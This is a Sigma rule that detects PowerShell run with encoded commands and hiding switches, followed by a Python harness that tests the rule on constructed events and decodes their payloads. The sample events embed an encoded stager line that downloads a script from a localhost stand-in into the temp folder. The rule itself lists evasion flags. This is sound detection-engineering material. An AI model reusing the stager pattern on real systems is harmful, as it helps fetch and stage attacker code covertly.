title: PowerShell EncodedCommand Execution
id: 99410337-d137-401f-ac19-3977cfa523a4
status: experimental
description: >
    Detects PowerShell launched with an encoded command payload, frequently used to
    hide intent during initial access and execution. Requires an -EncodedCommand style
    flag together with one of the common evasion switches (-NoProfile, -WindowStyle Hidden),
    since either signal on its own is far too noisy in most environments.
references:
    - https://attack.mitre.org/techniques/T1059/001/
author: Zion Boggan
date: 2026-05-12
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        - Image|endswith: '\powershell.exe'
        - Image|endswith: '\pwsh.exe'
        - OriginalFileName: 'PowerShell.EXE'
    selection_enc:
        # Sigma 'contains' is case-insensitive. PowerShell also accepts unambiguous
        # abbreviations such as -e and -en, which this list deliberately does not
        # cover; add them only after baselining, as ' -e ' alone is very noisy.
        CommandLine|contains:
            - ' -enc '
            - ' -encodedcommand '
            - ' -ec '
    selection_flags:
        CommandLine|contains:
            - ' -nop'
            - ' -noprofile'
            - ' -w hidden'
            - ' -windowstyle hidden'
    condition: selection_img and selection_enc and selection_flags
falsepositives:
    - Some management tooling and installers use encoded commands; baseline by parent process and by the decoded payload.
level: medium
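The following is an added example, not part of the rule above or of any Sigma project code. It re-implements the rule's three selections in Python so the logic can be exercised offline against a handful of constructed process_creation records, and it decodes the -EncodedCommand payload (base64 of a UTF-16LE string) so an analyst can see what the encoded argument actually runs. The field names (Image, OriginalFileName, CommandLine) follow Sigma's Windows process_creation taxonomy; the lower-casing emulates Sigma's case-insensitive `contains`/`endswith` and is not a real Sigma backend. The sample records, including the stager string, are constructed for the example.

```python
"""Evaluate the PowerShell EncodedCommand rule over constructed events."""
import base64
import re

# Patterns copied from the rule. Leading space mirrors Sigma ' -enc ' style
# so '-enc' is only matched as a distinct argument.
ENC_FLAGS = (" -enc ", " -encodedcommand ", " -ec ")
EVASION_FLAGS = (" -nop", " -noprofile", " -w hidden", " -windowstyle hidden")


def selection_img(ev):
    """Image ends with powershell.exe/pwsh.exe, or OriginalFileName is PowerShell.EXE."""
    image = ev.get("Image", "").lower()
    ofn = ev.get("OriginalFileName", "").lower()
    return (image.endswith("\\powershell.exe")
            or image.endswith("\\pwsh.exe")
            or ofn == "powershell.exe")


def selection_enc(ev):
    cl = ev.get("CommandLine", "").lower()
    return any(flag in cl for flag in ENC_FLAGS)


def selection_flags(ev):
    cl = ev.get("CommandLine", "").lower()
    return any(flag in cl for flag in EVASION_FLAGS)


def matches(ev):
    """The rule's condition: selection_img and selection_enc and selection_flags."""
    return selection_img(ev) and selection_enc(ev) and selection_flags(ev)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -enc/-ec/-encodedcommand, or None.

    PowerShell expects base64 over the UTF-16LE bytes of the script, so the
    decoded bytes are re-interpreted as UTF-16LE. Malformed payloads yield None.
    """
    m = re.search(r"(?i)\s-(?:enc|ec|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample payload, built the way an attacker's tooling builds it.
STAGER = "Invoke-WebRequest -Uri http://127.0.0.1/x -OutFile $env:TEMP\\x.ps1"
ENC_B64 = base64.b64encode(STAGER.encode("utf-16-le")).decode()

# Constructed process_creation records (not real telemetry).
SAMPLE_EVENTS = [
    {   # 0: encoded payload plus evasion switches -> should alert
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": f"powershell.exe -nop -w hidden -enc {ENC_B64}",
    },
    {   # 1: evasion switch only, no encoded command -> benign admin usage
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -NoProfile -Command Get-Process",
    },
    {   # 2: wrong image; the powershell child process would be its own event
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": f"cmd.exe /c powershell -nop -enc {ENC_B64}",
    },
    {   # 3: encoded command without evasion switches -> below threshold
        "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
        "OriginalFileName": "pwsh.dll",
        "CommandLine": f"pwsh.exe -ec {ENC_B64}",
    },
    {   # 4: abbreviated -e is a known gap of the rule's pattern list
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": f"powershell.exe -nop -w hidden -e {ENC_B64}",
    },
]


def evaluate(events):
    """Return one hit per matching event with the decoded payload attached."""
    hits = []
    for i, ev in enumerate(events):
        if matches(ev):
            hits.append({"index": i,
                         "image": ev["Image"],
                         "decoded": decode_encoded_command(ev["CommandLine"])})
    return hits


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(f"event {hit['index']}: {hit['image']}\n  decoded: {hit['decoded']}")
```

Event 4 is worth keeping in any test set: PowerShell resolves unambiguous parameter prefixes, so `-e` works exactly like `-EncodedCommand`, and a pattern list that only carries `-enc`, `-ec` and `-encodedcommand` misses it. Whether to add `' -e '` depends on how much noise your environment generates for that string, which is why the rule leaves it out.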